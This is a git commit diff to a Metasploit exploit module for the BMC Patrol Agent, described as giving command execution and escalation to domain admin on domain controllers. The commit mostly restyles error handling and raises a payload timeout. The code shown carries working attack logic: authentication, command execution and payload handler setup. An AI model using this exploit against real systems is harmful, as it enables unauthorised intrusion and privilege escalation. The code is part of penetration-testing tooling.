Style police :P

master
rwincey 2019-02-13 00:35:54 -05:00
parent b55fdc7323
commit e716c24f2d
1 changed files with 25 additions and 47 deletions

View File

@ -144,7 +144,8 @@ class MetasploitModule < Msf::Exploit::Remote
of the provided user is correct. This also means if the software is running on a
domain controller, it can be used to escalate from a normal domain user to domain
admin as SYSTEM on a DC is DA. **WARNING** The windows version of this exploit uses
powershell to execute the payload.
powershell to execute the payload. The powershell version tends to timeout on
the first run so it may take multiple tries.
},
'License' => MSF_LICENSE,
'Author' =>
@ -189,6 +190,7 @@ class MetasploitModule < Msf::Exploit::Remote
def cleanup
disconnect
print_status("Disconnected from BMC Patrol Agent.")
@inflater.close
@deflater.close
super
@ -196,10 +198,7 @@ class MetasploitModule < Msf::Exploit::Remote
def get_target_os( srv_info_msg )
lines = srv_info_msg.split("\n")
if lines[0] != "MS" and lines[1] != "{" and lines[-1] != "}"
print_error("Invalid server info msg.")
return
end
fail_with(Failure::UnexpectedReply, "Invalid server info msg.") if lines[0] != "MS" and lines[1] != "{" and lines[-1] != "}"
os = $nil
ver = $nil
@ -213,23 +212,20 @@ class MetasploitModule < Msf::Exploit::Remote
end
end
end
return [os,ver]
[os,ver]
end
def get_cmd_output( cmd_output_msg )
lines = cmd_output_msg.split("\n")
if lines[0] != "PEM_MSG" and lines[1] != "{" and lines[-1] != "}"
print_error("Invalid command output msg.")
return
end
fail_with(Failure::UnexpectedReply, "Invalid command output msg.") if lines[0] != "PEM_MSG" and lines[1] != "{" and lines[-1] != "}"
#Parse out command results
idx_start = cmd_output_msg.index("Result\x00")
idx_end = cmd_output_msg.index("RemPsl_user")
output = cmd_output_msg[idx_start+7..idx_end-1]
return output
output
end
def exploit
@ -243,13 +239,14 @@ class MetasploitModule < Msf::Exploit::Remote
#Configure the payload handler
payload_instance.exploit_config = {
'active_timeout' => 180
'active_timeout' => 300
}
# Set up the payload handlers
#Setup the payload handler
payload_instance.setup_handler
# Start the payload handler
#Start the payload handler
payload_instance.start_handler
end
#Initialize zlib objects
@ -263,45 +260,29 @@ class MetasploitModule < Msf::Exploit::Remote
#Create session msg
create_session
ret_data = receive_msg
if ret_data == $nil
print_error("Failed to receive session confirmation. Aborting.")
return
end
ret_len = ret_data.length
fail_with(Failure::UnexpectedReply, "Failed to receive session confirmation. Aborting.") if ret_data == $nil
#Authenticate
authenticate_user(datastore['USER'], datastore['PASSWORD'])
#receive the authentication response
ret_data = receive_msg()
if ret_data == $nil
print_error("Failed to receive authentication response. Aborting.")
return
end
ret_data = receive_msg
fail_with(Failure::UnexpectedReply, "Failed to receive authentication response. Aborting.") if ret_data == $nil
ret_msg = process_response( ret_data )
ret_msg = process_response(ret_data)
if ret_msg =~ /logged in/
print_status("Successfully authenticated user.")
else
print_error("Login failed. Aborting.")
return
fail_with(Failure::UnexpectedReply, "Login failed. Aborting.")
end
#receive the server info
ret_data = receive_msg()
if ret_data == $nil
print_error("Failed to receive server info msg. Aborting.")
return
end
srv_info = process_response( ret_data )
ret_data = receive_msg
fail_with(Failure::UnexpectedReply, "Failed to receive server info msg. Aborting.") if ret_data == $nil
srv_info = process_response(ret_data)
#Get the target's OS from their info msg
target_os = get_target_os(srv_info)
if target_os == $nil
print_error("Invalid server info msg. Aborting.")
return
end
# When using auto targeting, MSF selects the Windows meterpreter as the default payload.
# Fail if this is the case and ask the user to select an appropriate payload.
@ -324,27 +305,25 @@ class MetasploitModule < Msf::Exploit::Remote
run_cmd(command)
#receive command confirmation
ret_data = receive_msg()
ret_data = receive_msg
if ret_data != $nil
process_response( ret_data )
process_response(ret_data)
end
#receive command output
ret_data = receive_msg()
ret_data = receive_msg
if ret_data != $nil and datastore['CMD'] != $nil
cmd_result_data = process_response( ret_data )
cmd_result = get_cmd_output(cmd_result_data)
if cmd_result != $nil
print_status( "Output:\n#{cmd_result}" )
end
end
#Handle the shell
handler
end
def receive_msg()
def receive_msg
header = sock.get_once(6)
if header == $nil
@ -367,7 +346,6 @@ class MetasploitModule < Msf::Exploit::Remote
def send_msg(type, compression, data)
ret_len = 0
data_len = data.length
buf = [data_len].pack('N')
@ -1078,7 +1056,7 @@ class MetasploitModule < Msf::Exploit::Remote
def des_string_to_key( key_buf_str )
init_des()
init_des
temp_key1 = Array.new(8,0)
temp_key2 = Array.new(8,0)